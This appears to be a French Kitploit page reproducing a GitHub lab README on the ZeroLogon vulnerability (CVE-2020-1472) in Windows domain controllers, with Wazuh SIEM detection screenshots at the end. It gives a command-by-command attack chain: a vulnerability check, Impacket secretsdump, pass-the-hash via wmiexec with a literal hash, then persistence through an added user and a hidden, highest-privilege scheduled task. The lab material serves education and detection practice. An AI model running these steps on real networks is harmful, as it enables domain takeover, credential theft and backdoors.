Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ZeroLogon-CVE-2020-1472-lab — Explication et démonstration de la vulnérabilité ZeroLogon (CVE-2020-1472) | Kitploit
Outils/GitHubGitHub/100hnomeunome/zerologon-cve-2020-1472-lab
Escalade de PrivilègesAttaques de Mots de PasseMécanismes de PersistanceAnalyse des VulnérabilitésExploitationPost-ExploitationCTFTests d'IntrusionApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Labs et Pratique
GitHub100hnomeunome/zerologon-cve-2020-1472-lab

ZeroLogon-CVE-2020-1472-lab

Explication et démonstration de la vulnérabilité ZeroLogon (CVE-2020-1472)

Voir le dépôt
5il y a 11 moisPas encore vérifié

ZeroLogon-CVE-2020-1472

Explication et démonstration de la vulnérabilité ZeroLogon (CVE-2020-1472)

L'objectif de ce laboratoire est strictement éducatif. Son exécution n'est pas recommandée dans des environnements de production ou qui ne vous appartiennent pas.

À propos de la vulnérabilité

Contexte de la vulnérabilité

Cette vulnérabilité permet à un cybercriminel de prendre le contrôle d'un contrôleur de domaine (DC). Cela se fait en modifiant ou en supprimant le mot de passe d'un compte de service sur le contrôleur. L'agent malveillant peut simplement causer un déni de service ou prendre le contrôle et posséder tout le réseau. En août 2020, Microsoft a publié un correctif.

  • Sévérité : 10,0 (Critique) (CVSS v3.1)

Composant affecté : Microsoft Netlogon Remote Protocol (MS-NRPC)

Versions de Windows affectées :

  • Windows Server 2008 R2
  • 2012 / 2012 R2
  • 2016
  • 2019
  • Versions antérieures au correctif d'août/septembre 2020

Prérequis

Cloner les dépôts

  • Impacket
  • zerologon-CVE-2020-1472
  • CVE-2020-1472 - Tester si le serveur cible est vulnérable

Si exécuté localement !

  • Télécharger Kali Linux
  • Télécharger Windows Server 2008 R2 vulnérable
  • Virtualbox

Sur AWS c'est également possible avec ces images (attention à la facturation)

  • Windows vulnérable - AMI de la communauté 921877552404/win2016-dvwa-printnightmare-final-2022-07-04
  • Kali Linux - AMI du Marketplace

Supplément : Un compte Wazuh pour l'analyse des événements du SIEM.

  • Wazuh Cloud avec essai de 14 jours

Comment exploiter

Astuce : Sous Kali Linux, le service SSH est désactivé par défaut — il est nécessaire de le démarrer manuellement.

Avant de tester si le serveur est vulnérable, nous pouvons utiliser nmap pour voir quels ports sont ouverts :

root@kitploit:~
nmap -sS -T4 -F --open -n ip
Captura de Tela 2025-10-10 às 09 34 13

En utilisant CVE-2020-1472 - Tester si le serveur cible est vulnérable. Exécutez la commande :

root@kitploit:~
zerologon_tester.py <dc-name> <dc-ip>
Captura de Tela 2025-10-04 às 20 14 40

L'outil secretdump est une boîte à outils d'Impacket

root@kitploit:~
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
Captura de Tela 2025-10-04 às 20 23 53
root@kitploit:~
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
Captura de Tela 2025-10-04 às 20 27 05

Si tout se passe bien, nous pourrons nous connecter avec le hash Qu'est-ce qu'une attaque pass-the-hash ?

Captura de Tela 2025-10-04 às 20 30 39

Maintenant, il suffit de créer une persistance ! Cela peut être un nouvel utilisateur !

root@kitploit:~
net user coringa Batman2025 /add
Captura de Tela 2025-10-04 às 20 36 09

Fait ! L'utilisateur a été créé avec succès !

Captura de Tela 2025-10-04 às 20 38 04

Il est également possible de créer une tâche !

root@kitploit:~
mkdir C:\Temp
root@kitploit:~
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
Captura de Tela 2025-10-10 às 10 17 17 Captura de Tela 2025-10-10 às 10 20 33

Événements dans le SIEM

Il est possible de voir la création de l'utilisateur et les événements liés au pass-the-hash et la création d'utilisateurs !

2025-10-06_10-08-10 2025-10-06_10-09-06

Références

  • Zerologon (CVE-2020-1472) : Une élévation de privilèges non authentifiée à un privilège complet sur le domaine
  • Qu'est-ce que Zerologon ?
  • [MS-NRPC] : Protocole distant Netlogon
  • Détail CVE-2020-1472
  • ZeroLogon-CVE-2020-1472 - Lab sur Youtube
  • Attaque Pass-the-Hash
  • En savoir plus sur Impacket
Télécharger l’outil